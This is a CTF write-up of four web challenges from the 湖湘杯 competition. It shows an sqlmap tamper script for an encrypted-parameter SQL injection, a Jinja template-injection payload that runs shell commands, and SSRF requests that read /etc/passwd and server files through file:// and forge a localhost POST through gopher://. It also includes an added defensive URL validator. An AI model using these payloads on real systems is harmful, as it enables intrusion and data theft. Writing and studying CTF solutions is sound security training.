湖湘杯 Web

1. Code Check WEB

Look at the notice at the bottom of the page. The news directory has directory listing enabled, so the source can be downloaded; list.php then decrypts the id parameter and concatenates it straight into the SQL query, a simple SQL injection.
Write an encode function as the inverse of the decode function:

<?php header('content-type:text/html;charset=utf-8');
// require_once '../config.php';
// decryption routine: AES-128-CBC with a fixed key and IV, wrapped in double base64
function decode($data) {
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
    mcrypt_generic_init($td, 'ydhaqPQnexoaDuW3', '2018201920202021');
    $data = mdecrypt_generic($td, base64_decode(base64_decode($data)));
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    // the plaintext must end with the fixed suffix 'hxb2018'
    if (substr(trim($data), -7) !== 'hxb2018') {
        echo '<script>window.location.href="/index.php";</script>';
    } else {
        return substr(trim($data), 0, strlen(trim($data)) - 7);
    }
}
// encryption routine written as the exact inverse of decode()
function encode($data) {
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
    mcrypt_generic_init($td, 'ydhaqPQnexoaDuW3', '2018201920202021');
    $data = $data.'hxb2018';
    $data = mcrypt_generic($td, $data);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    $data = base64_encode(base64_encode($data));
    return $data;
}
echo encode($_POST['data']);
// $id=decode($_GET['id']);
// $sql="select id,title,content,time from notice where id=$id";
// echo $sql;
// $info=$link->query($sql);
// $arr=$info->fetch_assoc();
?>

Write an sqlmap tamper script, as follows:

#!/usr/bin/env python
import requests
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    # send the raw payload to the local encode() script and use the returned
    # ciphertext as the value of the id parameter
    r = requests.post('http://myhack.com/list.php', data={"data": payload})
    return r.text

Then run sqlmap with the tamper:

python sqlmap.py -u "http://47.107.164.116:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09" --tamper tamper/1.py --batch --tech=U -D mozhe_discuz_stormgroup --dump

2. WEB XmeO

47.107.238.175:9990

After registering and logging in, the "add todo list" feature turns out to have a template injection.

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('grep -r hxb /home/XmeO/').read()") }}{% endif %}{% endfor %}

The flag is read successfully:

Binary file /home/XmeO/test.db matches /home/XmeO/auto.js: 'value' : 'hxb2018{163cad86dfd1cc8027cb6e5ebd1245d0}'

3. WEB Readflag

The url parameter accepts the file protocol, so first read /etc/passwd.

Then try to read the apache site configuration file:

http://47.107.238.3/?url=file:///etc/apache2/sites-available/000-default.conf

The source location is easy to spot:

/var/www/html/ssrf/web.php

Read the source:

http://47.107.238.3/?url=file:///var/www/html/ssrf/web.php

<?php
if (!isset($_GET['url'])) {
    echo "ssrf me with parameter 'url'";
}
// fetch whatever URL the client supplies, with no scheme or host restriction
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
//echo $_GET['url'];
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
//var_dump($_POST);
// the admin branch trusts the source IP alone
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($_POST['user'])) {
    if ($_POST['user'] == "admin" && $ip == "127.0.0.1") {
        system("/var/www/html/ssrf/readflag");
    }
}
?>

There is a readflag binary; download it:

http://47.107.238.3/?url=file:/var/www/html/ssrf/readflag

Reverse it.

The location of the flag file is visible.

Read it:

http://47.107.238.3/?url=file:///var/www/html/ssrf/flag

Alternatively, use the gopher protocol:

http://47.107.238.3/?url=gopher://127.0.0.1:80/_POST%20/web/ssrf.php HTTP/1.1%250d%250aHost:127.0.0.1%250d%250aContent-Type:application/x-www-form-urlencoded%250d%250aContent-Length:10%250d%250a%250d%250auser=admin
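Added example, not part of the original writeup or the challenge code: a Python validator for the kind of fetch-by-URL endpoint that web.php implements. It rejects the file:// and gopher:// requests used above and any host that resolves to loopback or private address space. The resolver hook and the SAMPLE_DNS table are constructed so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # everything else (file, gopher, dict, ...) is refused

def is_non_public(ip_str):
    """True for loopback, RFC1918/private, link-local, reserved, multicast or unspecified."""
    ip = ipaddress.ip_address(ip_str)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def system_resolver(host):
    """Default resolver: every address the OS returns, so a name pointing at 127.0.0.1 is caught."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def check_url(url, resolver=system_resolver):
    """Return (allowed, reason). Only plain http/https to a public address passes."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %s" % (parts.scheme or "(none)")
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        addrs = [str(ipaddress.ip_address(host))]  # IP literal (v4 or bracketed v6): no lookup
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            addrs = []
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:  # a single non-public answer is enough to refuse the whole URL
        if is_non_public(addr):
            return False, "resolves to non-public address %s" % addr
    return True, "ok"

# Constructed sample DNS table (not real hosts) so the demo runs offline.
SAMPLE_DNS = {"public.example": ["1.2.3.4"], "intranet.example": ["10.0.0.5"]}

def sample_resolver(host):
    return SAMPLE_DNS.get(host, [])

if __name__ == "__main__":
    for u in ("file:///etc/passwd", "gopher://127.0.0.1:80/_POST",
              "http://127.0.0.1/ssrf/web.php", "http://intranet.example/",
              "http://public.example/"):
        print(u, "->", check_url(u, resolver=sample_resolver))
```

Even with this check the fetcher must connect to the address that was validated rather than resolving the name a second time, and the admin branch should require real authentication instead of trusting REMOTE_ADDR == 127.0.0.1.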

4. WEB MyNote

This is a known challenge, so I solved it directly with the existing payload.

Construct the payload.

Trigger it.

Decode it and get the flag.

Summary

Have fun!